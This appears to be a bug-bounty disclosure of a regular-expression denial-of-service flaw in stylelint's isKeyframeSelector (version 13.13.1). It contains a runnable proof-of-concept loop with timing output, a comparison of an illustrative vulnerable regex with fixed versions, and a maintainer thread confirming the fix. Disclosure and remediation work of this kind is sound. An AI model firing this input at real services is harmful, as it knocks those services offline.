Inefficient Regular Expression Complexity in stylelint/stylelint

Valid

Reported on

Oct 16th 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in stylelint.

It allows causing a denial of service when calling the function isKeyframeSelector.

Proof of Concept

// PoC.js
// Calls isKeyframeSelector on strings of the form "111...1a": a long run of
// digits followed by a character that makes the string an invalid keyframe
// selector, so each call has to fail. Every iteration adds 10,000 digits and
// prints how long that single call took.
var isKeyframeSelector = require("stylelint/lib/utils/isKeyframeSelector")


for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '1'.repeat(i*10000)+"a";
    isKeyframeSelector(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

Check The Output

"attack_str.length: 10001: 290 ms"
"attack_str.length: 20001: 1072 ms"
"attack_str.length: 30001: 2047 ms"
"attack_str.length: 40001: 3640 ms"
"attack_str.length: 50001: 5688 ms"
"attack_str.length: 60001: 8237 ms"
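The timings above grow roughly with the square of the input length (doubling the digits quadruples the time), which is what a validator shows when two adjacent quantifiers can split the same run of digits in many ways and the engine tries every split before failing. The block below is an added example and is not stylelint's code: the "vulnerable" regex is an assumed stand-in with that structure, not quoted from stylelint's isKeyframeSelector, and it accepts exactly the same inputs as the two hardened forms next to it (an unambiguous regex and a regex-free scanner). The names isKeyframeSelectorVulnerable, isKeyframeSelectorSafe, isKeyframeSelectorScan and measureMs are mine, and the attack input is constructed in the same shape as the PoC's.

```javascript
// Added example, not stylelint's code. PERCENT_RE_VULNERABLE is an assumed
// stand-in with the structure that produces quadratic backtracking; it is not
// quoted from stylelint's isKeyframeSelector.

const KEYWORDS = new Set(['from', 'to']);

// Ambiguous: in "\d+\.?\d*" (and "\d*\.?\d+") the two digit quantifiers are
// separated only by an optional ".", so a run of n digits that is not followed
// by "%" can be split between them in n ways. The engine tries every split for
// each alternative before giving up: O(n^2) steps per failing call.
const PERCENT_RE_VULNERABLE = /^(?:\d+\.?\d*|\d*\.?\d+)%$/;

// Unambiguous, same language (digits with at most one ".", at least one digit,
// then "%"): each character belongs to exactly one quantifier, and "\.\d*" can
// only start at a literal ".", so a failing input backtracks O(n) times with
// O(1) work each.
const PERCENT_RE_SAFE = /^(?:\d+(?:\.\d*)?|\.\d+)%$/;

function isKeyframeSelectorVulnerable(selector) {
  return KEYWORDS.has(selector) || PERCENT_RE_VULNERABLE.test(selector);
}

function isKeyframeSelectorSafe(selector) {
  return KEYWORDS.has(selector) || PERCENT_RE_SAFE.test(selector);
}

// Regex-free alternative: one left-to-right pass, linear by construction, with
// the acceptance rule spelled out instead of encoded in quantifier placement.
function isKeyframeSelectorScan(selector) {
  if (KEYWORDS.has(selector)) return true;
  if (selector.length < 2 || selector[selector.length - 1] !== '%') return false;
  let digits = 0;
  let dots = 0;
  for (let i = 0; i < selector.length - 1; i++) {
    const c = selector[i];
    if (c >= '0' && c <= '9') digits++;
    else if (c === '.' && dots === 0) dots++;
    else return false;
  }
  return digits > 0;
}

// Time one call on the PoC's input shape: a long digit run ending in "a"
// (constructed here), which is not a keyframe selector and therefore forces
// the validator down its failure path.
function measureMs(validator, digitCount) {
  const attackStr = '1'.repeat(digitCount) + 'a';
  const start = Date.now();
  const matched = validator(attackStr);
  return { matched, ms: Date.now() - start };
}

// Short demonstration; the sizes are kept small so the file finishes quickly.
for (const n of [5000, 10000]) {
  const slow = measureMs(isKeyframeSelectorVulnerable, n);
  const fast = measureMs(isKeyframeSelectorSafe, n);
  const scan = measureMs(isKeyframeSelectorScan, n);
  console.log(`n=${n}: vulnerable ${slow.ms} ms, safe regex ${fast.ms} ms, scanner ${scan.ms} ms`);
}
```

The practical check when reviewing a fix like this is twofold: confirm the replacement accepts and rejects the same inputs as the original (the scanner doubles as an executable specification for that), and confirm the failure path, not just the success path, is linear, because attackers supply inputs that almost match.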
Yeting Li
a month ago

Researcher


@admin, please see the security policy https://github.com/stylelint/stylelint/security/policy

We have contacted a member of the stylelint team and are waiting to hear back
a month ago
stylelint/stylelint maintainer
a month ago

Maintainer


Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.

Yeting Li
a month ago

Researcher


Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.

stylelint/stylelint maintainer
a month ago

Maintainer


Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.

As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?

Yeting Li
a month ago

Researcher


Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!

stylelint/stylelint maintainer validated this vulnerability a month ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
stylelint/stylelint maintainer confirmed that a fix has been merged on 060310 a month ago
The fix bounty has been dropped